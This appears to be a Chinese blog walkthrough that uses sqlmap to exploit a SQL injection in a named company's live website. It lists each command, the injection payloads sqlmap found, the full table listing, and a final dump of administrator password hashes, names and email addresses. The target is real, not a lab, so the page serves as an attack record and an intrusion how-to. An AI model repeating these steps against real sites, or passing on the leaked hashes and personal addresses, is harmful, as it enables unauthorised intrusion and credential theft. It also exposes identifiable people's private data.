sqlmap
| url: http://www.microtek.com.cn/happystudy/happystudy_info.php?idnow=4 第一步: -u 注入地址 --dbms "Mysql" --current-user 获取当前用户名 [root@Hacker~]# Sqlmap -u http://www.microtek.com.cn/happystudy/happystudy_info .php?idnow=4 --dbms "Mysql" --current-user y/n 选择y后获得结果 sqlmap identified the following injection points with a total of 17 HTTP(s) requ ests: --- Place: GET Parameter: idnow Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: idnow=4 AND 8576=8576 Type: UNION query Title: MySQL UNION query (NULL) - 8 columns Payload: idnow=4 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT (0x3a71696d3a,0x586d 766645564446784b,0x3a68706b3a), NULL, NULL, NULL, NULL, NULL, NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: idnow=4 AND SLEEP(5) --- web application technology: Apache 2.2.16, PHP 5.2.17 back-end DBMS: MySQL 5.0.11 current user: 'zjmall@localhost' 第一步的结果: 得到用户名 zjmall 第二步: 获得当前数据库名 [root@Hacker~]# Sqlmap -u http://www.microtek.com.cn/happystudy/happystudy_info .php?idnow=4 --dbms "Mysql" --current-db 第二步得到的结果 current database: 'xbase' 这是数据库名 第三步: -u 注入地址 --dbms "Mysql" --tables -D "xbase" 其中"xbase"是数据库名 获得当前数据库下的所有表名 [root@Hacker~]# Sqlmap -u http://www.microtek.com.cn/happystudy/happystudy_info .php?idnow=4 --dbms "Mysql" --tables -D "xbase" 第二步得到结果 +---------------------------------------------+ | address_book | | address_format | | admin | | admin_files | | admin_groups | | awards | | banners | | banners_history | | block_p | | card | | categories | | categories_description | | cdb_announcements | | cdb_attachments | | cdb_banned | | cdb_buddys | | cdb_favorites | | cdb_forumlinks | | cdb_forums | | cdb_karmalog | | cdb_members | | cdb_pm | | cdb_poll | | cdb_posts | | cdb_searchindex | | cdb_sessions | | cdb_settings | | cdb_smilies | | cdb_stats | | cdb_styles | | cdb_stylevars | | cdb_subscriptions | | cdb_templates | | cdb_threads | | cdb_usergroups | | cdb_words | | channel_user | | christmas | | cms_ad | | configuration | | configuration_group | | copyright | | counter | | counter_area | | counter_browser | | counter_daily | | counter_day | | counter_detail | | counter_history | | counter_month | | counter_year | | countries | | currencies | | customers | | customers_basket | | customers_basket_attributes | | customers_info | | data | | detail | | detail3 | | detail_str | | doa_info | | doa_info_old | | doa_products | | doa_user | | download | | downloadccccc | | driver_download | | driver_faq | | driver_faq_sort | | driver_os | | driver_os_old | | driver_products | | enter | | faq | | faq1 | | fenleibiao | | fujialm | | geo_zones | | hp_gb | | hp_newscontent | | hp_newstitle | | imgupload | | integral | | languages | | log_time | | magazine | | mail | | manufacturers | | manufacturers_info | | mpcaward | | newsletters | | orders | | orders_products | | orders_products_attributes | | orders_products_download | | orders_status | | orders_status_history | | orders_total | | other_download | | other_download_old | | pagecontent | | pdbmb | | phpbb_themes_name | | probase | | products | | products_attributes | | products_attributes_download | | products_description | | products_firstpage_show | | products_notifications | | products_options | | products_options_values | | products_options_values_to_products_options | | products_to_categories | | projector | | question2 | | question_classify | | question_ok | | question_user | | question_wait | | reviews | | reviews_description | | rma_info | | salable | | sanbaoka | | sessions | | software_xz | | specials | | study | | study09 | | study2014 | | study_sort | | sypdb | | sytpb | | tax_rates | | tb_admin | | tb_adurl | | tb_code | | tb_productbase | | tb_productcapability | | tb_search | | tb_search_sort | | tb_type | | tb_type201503 | | tb_user | | tcpdlb3 | | tcptpb | | tfzcpb | | tggxnb | | tggxxb | | thc | | tips | | title_pic | | tjgxxb | | tjxcb | | total | | total201505 | | town | | tv_show | | txcxxb | | txmtpb | | txpfj | | tygb | | user2 | | user_base | | userinfo | | wenjuan | | whos_online | | window | | wxzd_products | | wxzd_station | | wxzd_station2014 | | wxzk_sation2014_7 | | zones | | zones_to_geo_zones | +---------------------------------------------+ 敏感表名 -- admin 第三步: -u 注入地址 --dbms "Mysql" --columns -T "admin" -D "xbase" 其中"admin"是表名 获得当前表下的所有字段 [root@Hacker~]# Sqlmap -u http://www.microtek.com.cn/happystudy/happystudy_info .php?idnow=4 --dbms "Mysql" --columns -T "admin" -D "xbase" 第三步得到结果 Database: xbase Table: admin [10 columns] +---------------------+-------------+ | Column | Type | +---------------------+-------------+ | admin_created | datetime | | admin_email_address | varchar(96) | | admin_firstname | varchar(32) | | admin_groups_id | int(11) | | admin_id | int(11) | | admin_lastname | varchar(32) | | admin_logdate | datetime | | admin_lognum | int(11) | | admin_modified | datetime | | admin_password | varchar(40) | +---------------------+-------------+ 敏感字段 admin_password admin_email_address admin_firstname 第四步: -u 注入地址 --dbms "Mysql" --dump -C "admin_email_address,admin_firstname,admi n_password" -T "admin" -D "xbase" -v 0 其中"admin_email_address,admin_firstname,admi n_password"是表里的字段名 获取字段里的内容 [root@Hacker~]# Sqlmap -u http://www.microtek.com.cn/happystudy/happystudy_info .php?idnow=4 --dbms "Mysql" --dump -C "admin_email_address,admin_firstname,admin _lastname,admin_password" -T "admin" -D "xbase" -v 0 第四步得到结果 +-------------------------------------------------------------------+ | admin_password | admin_lastname | admin_firstname | admin_email_address | -------------------------+ | abb54e54d8506963266a299868b416f0:1a | Lee | Roy | root@zj.microtek.com.cn | | 4b53fdaeaa03382e1c6e190416807892:4d | Administrator | Store | xiaoping.chen@microtek.com.cn | | 73b1911cf444c08c46a549a6a10a690c | sdf | a | roy@microtek.com.cn | +-------------------------------------------------------------------+ 看起来admin_lastname像是账号 或者是admin_email_address是账号(我也没有实验) |
浙公网安备 33010602011771号